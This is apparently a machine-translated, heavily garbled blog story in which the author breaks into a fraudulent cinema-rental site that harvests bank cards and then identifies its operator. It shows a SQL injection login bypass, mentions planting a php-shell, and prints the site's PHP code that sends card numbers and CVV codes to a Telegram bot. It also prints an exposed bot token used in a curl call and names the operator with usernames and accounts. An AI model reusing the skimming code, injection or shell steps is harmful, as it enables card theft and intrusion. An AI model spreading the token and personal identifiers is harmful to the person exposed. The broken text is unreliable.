注釈

私たちはそれぞれ攻撃者の被害者になることができますが、捕食者と獲物が場所を変えることもあります。

これは、テクノロジーの不適切な使用が人格の開示にどのようにつながるかについての短編小説です。この記事は、「簡単なお金」を手に入れたい若いハッカーと、それをキャッチしたい人の両方に役立つでしょう。

はじめに

ある2月の夜、恋人とのロマンチックなデートの場所を探すのに忙しかった。しばらくして、現在利用できないサイトmilleniumfilm.ruに注目しました。このサイトは、個人の視聴のために小さな映画館のレンタルサービスを提供しました。美しい写真、手ごろな価格、オンラインサポートがありますが、1つだけ、同じドメインの保護されていないページに銀行カードデータを入力することが提案されました。慎重に、私はサイトの技術サポートに手紙を書きました。詐欺師たちは待つのに時間がかかりませんでした-私は技術的に十分な能力があり、3文字を送ってくれたことに気付きました。もちろん、詐欺師は私に時間を浪費する意味はありませんが、なぜそんなに失礼なのでしょうか？ -どんな状況でも、あなたは人間であり続ける必要があります。

同じ計画のサイトに関するレビューは、 zhaloba-online.ruにあります。それらのいくつかはまだ動作します。

ハッキング

普遍的な不正を感じて、攻撃者の身元を確認し、攻撃者の活動を抑制するために、脆弱性のサイトを調査し始めました。 ~~空に指を向けると、~~最初に入力したアドレスから管理パネルに移動し、「ログイン」と「パスワード」の入力を丁寧に求められました。

スクリーンショット

~~SQLインジェクションの最初の試み~~頭に浮かんだ最初のパスワード

1' or '1

, .

Gelloiss.ru . « » — : , , , cvc2 .

. .

, 3D-secure, . , . , 3D-secure . , , .

« » - . , php-shell. /images/, login.php. , .

telegram.php.

$ cat telegram.php
<?
function send_mess($text) {
  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
  $mess = $text;
  $chat = "-302359340";
  /*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}

PHP - send_mess. , - , .

grep

./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A  : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21:  send_mess(": ".$sum."%0D%0A  : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);

, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram- ).

gelloiss.ru

, , .

curl

$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}

username — «gelloiss».

: ! : «gelloiss», «ura7887», , «Gelloiss.ru», skype «ura7887».

: vk.com , 6 , 14 .

anime.anidub.com.

blackhacker.ru, .

, Gelloiss.ru telegram, telegram- . , telegram- .

shell

$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8  -

telegram : a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .

telegram

, . , 100 , +100.

, «». « » .

, . : 3 - 13 . , - , 2 . , , . , moneyonline.world.

Update 2019-04-21: gelloiss , , , telegram:

Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

ハッカーをどうやって捕まえたのか

注釈

はじめに

ハッキング

telegram

More articles: